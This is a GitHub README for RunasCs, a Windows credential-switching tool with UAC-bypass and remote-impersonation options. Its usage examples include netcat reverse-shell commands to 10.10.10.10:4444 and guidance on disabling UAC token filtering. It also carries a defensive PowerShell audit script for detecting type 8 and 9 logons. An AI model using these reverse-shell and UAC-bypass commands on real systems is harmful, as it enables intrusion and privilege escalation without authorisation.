antonioCoco/RunasCs
GitHub: antonioCoco/RunasCs
A C# implementation of a Windows credential-switching utility that overcomes the limitations of runas.exe when launched from service processes and under UAC, with support for remote I/O redirection and several logon types.
Stars: 1358 | Forks: 162
### RunasCs
*RunasCs* is a utility to run specific processes with explicit credentials, under a different set of permissions than the user's current logon provides.
The tool is an improved, open-source version of the Windows built-in *runas.exe* that solves some of its limitations:
* Allows explicit credentials
* Works whether it is spawned from an interactive process or from a service process
* Manages the *DACL* of *Window Stations* and *Desktop* correctly so that the new process can be created
* Uses more reliable create-process functions, such as ``CreateProcessAsUser()`` and ``CreateProcessWithTokenW()``, if the calling process holds the required privileges (automatically detected)
* Allows specifying the logon type, e.g. 8-NetworkCleartext logon (no *UAC* limitations)
* Allows bypassing UAC when an administrator's password is known (flag --bypass-uac)
* Allows creating a process whose main thread impersonates the requested user (flag --remote-impersonation)
* Allows redirecting *stdin*, *stdout* and *stderr* to a remote host
* It's open source :)
*RunasCs* has an automatic detection that determines the best create-process function for each context.
Depending on the privileges of the caller's process token, it uses one of the following create-process functions, in this order of preference:
1. ``CreateProcessAsUserW()``
2. ``CreateProcessWithTokenW()``
3. ``CreateProcessWithLogonW()``
### Requirements
.NET Framework >= 2.0
### Usage
```
RunasCs v1.5 - @splinter_code
Usage:
RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--force-profile] [--bypass-uac] [--remote-impersonation]
Description:
RunasCs is an utility to run specific processes under a different user account
by specifying explicit credentials. In contrast to the default runas.exe command
it supports different logon types and CreateProcess* functions to be used, depending
on your current permissions. Furthermore it allows input/output redirection (even
to remote hosts) and you can specify the password directly on the command line.
Positional arguments:
username username of the user
password password of the user
cmd commandline for the process
Optional arguments:
-d, --domain domain
domain of the user, if in a domain.
Default: ""
-f, --function create_process_function
CreateProcess function to use. When not specified
RunasCs determines an appropriate CreateProcess
function automatically according to your privileges.
0 - CreateProcessAsUserW
1 - CreateProcessWithTokenW
2 - CreateProcessWithLogonW
-l, --logon-type logon_type
the logon type for the token of the new process.
Default: "2" - Interactive
-t, --timeout process_timeout
the waiting time (in ms) for the created process.
This will halt RunasCs until the spawned process
ends and sent the output back to the caller.
If you set 0 no output will be retrieved and a
background process will be created.
Default: "120000"
-r, --remote host:port
redirect stdin, stdout and stderr to a remote host.
Using this option sets the process_timeout to 0.
-p, --force-profile
force the creation of the user profile on the machine.
This will ensure the process will have the
environment variables correctly set.
WARNING: If non-existent, it creates the user profile
directory in the C:\Users folder.
-b, --bypass-uac
try a UAC bypass to spawn a process without
token limitations (not filtered).
-i, --remote-impersonation
spawn a new process and assign the token of the
logged on user to the main thread.
Examples:
Run a command as a local user
RunasCs.exe user1 password1 "cmd /c whoami /all"
Run a command as a domain user and logon type as NetworkCleartext (8)
RunasCs.exe user1 password1 "cmd /c whoami /all" -d domain -l 8
Run a background process as a local user,
RunasCs.exe user1 password1 "C:\tmp\nc.exe 10.10.10.10 4444 -e cmd.exe" -t 0
Redirect stdin, stdout and stderr of the specified command to a remote host
RunasCs.exe user1 password1 cmd.exe -r 10.10.10.10:4444
Run a command simulating the /netonly flag of runas.exe
RunasCs.exe user1 password1 "cmd /c whoami /all" -l 9
Run a command as an Administrator bypassing UAC
RunasCs.exe adm1 password1 "cmd /c whoami /priv" --bypass-uac
Run a command as an Administrator through remote impersonation
RunasCs.exe adm1 password1 "cmd /c echo admin > C:\Windows\admin" -l 8 --remote-impersonation
```
The two processes (the caller and the spawned one) communicate through a *pipe* (for *stdout* and *stderr*).
The default logon type is 2 (*Interactive*).
By default, the *Interactive* (2) logon type is limited by *UAC*, and the tokens produced by these authentications are filtered.
You can perform an interactive logon without any limitation by setting the following registry key to 0 and restarting the server:
```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
```
Otherwise, you can try the **--bypass-uac** flag to attempt a bypass of the token-filtering limitation.
The **NetworkCleartext (8)** logon type is the most permissive one, because it is not filtered by UAC in the local token and still allows authenticating over the network, since the credentials are stored in the authentication package. If you hold enough privileges, try to always specify this logon type via the flag --logon-type 8.
By default, the calling process (*RunasCs*) waits until the spawned process has finished executing.
If you need to spawn a background or asynchronous process, e.g. when spawning a reverse shell, you need to set the ``-t timeout`` argument to ``0``. In this case, *RunasCs* does not wait for the newly spawned process to finish.
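A defender-side audit matching the two points above (the EnableLUA value and the logon types 8 and 9), as an added PowerShell example that is not part of RunasCs: it reports whether UAC token filtering has been switched off and lists recent 4624 logon events of type 8 (NetworkCleartext) or 9 (NewCredentials) together with the process and source address that produced them. It assumes an elevated session (the Security log is not readable otherwise) and a 24-hour look-back window.

```powershell
# Added example (not RunasCs code). Run in an elevated PowerShell on the host being audited.

# 1. Hardening check: EnableLUA = 0 disables UAC token filtering, so interactive (type 2)
#    logons of an administrator yield a full, unfiltered token.
$uacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$enableLua = (Get-ItemProperty -Path $uacKey -Name EnableLUA -ErrorAction SilentlyContinue).EnableLUA
if ($enableLua -eq 0) {
    Write-Warning "EnableLUA is 0: UAC token filtering is disabled on this host."
} else {
    Write-Host "EnableLUA = $enableLua (UAC token filtering is active)"
}

# 2. Detection: successful logons (4624) of type 8 or 9 in the last 24 hours.
#    Both types are created locally with explicit credentials (LogonProcessName is usually
#    'Advapi' for LogonUser calls), so a local ProcessName with one of these types is a
#    useful triage signal. Type 8 is also produced legitimately by e.g. IIS Basic auth;
#    tune on ProcessName before alerting.
$since  = (Get-Date).AddHours(-24)
$filter = @{ LogName = 'Security'; Id = 4624; StartTime = $since }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

foreach ($ev in $events) {
    # Pull the EventData fields by name rather than by positional index.
    $xml  = [xml]$ev.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    if ($data.LogonType -in @('8', '9')) {
        [pscustomobject]@{
            Time         = $ev.TimeCreated
            LogonType    = $data.LogonType
            TargetUser   = "$($data.TargetDomainName)\$($data.TargetUserName)"
            SubjectUser  = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
            LogonProcess = $data.LogonProcessName
            Process      = $data.ProcessName
            SourceIp     = $data.IpAddress
        }
    }
}
```

Pipe the output to `Format-Table` or `Export-Csv` to review it; SubjectUser is the account that supplied the explicit credentials and TargetUser is the account they resolved to.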
### References
* [Potatoes and tokens](https://decoder.cloud/2018/01/13/potato-and-tokens/)
* [Starting an Interactive Client Process in C++](https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85))
* [Creating a Child Process with Redirected Input and Output](https://learn.microsoft.com/en-us/windows/win32/procthread/creating-a-child-process-with-redirected-input-and-output)
* [Interactive Services](https://learn.microsoft.com/en-us/windows/win32/services/interactive-services)
* [What is up with "The application failed to initialize properly (0xc0000142)" error?](https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/)
* [Getting an Interactive Service Account Shell](https://www.tiraniddo.dev/2020/02/getting-interactive-service-account.html)
* [Reading Your Way Around UAC (Part 1)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-1.html)
* [Reading Your Way Around UAC (Part 2)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html)
* [Reading Your Way Around UAC (Part 3)](https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-3.html)
* [Vanara - A set of .NET libraries for Windows implementing PInvoke calls to many native Windows APIs with supporting wrappers](https://github.com/dahall/Vanara)
### Credits
* [@decoder](https://github.com/decoder-it)
* [@qtc-de](https://github.com/qtc-de)
* [@winlogon0](https://twitter.com/winlogon0)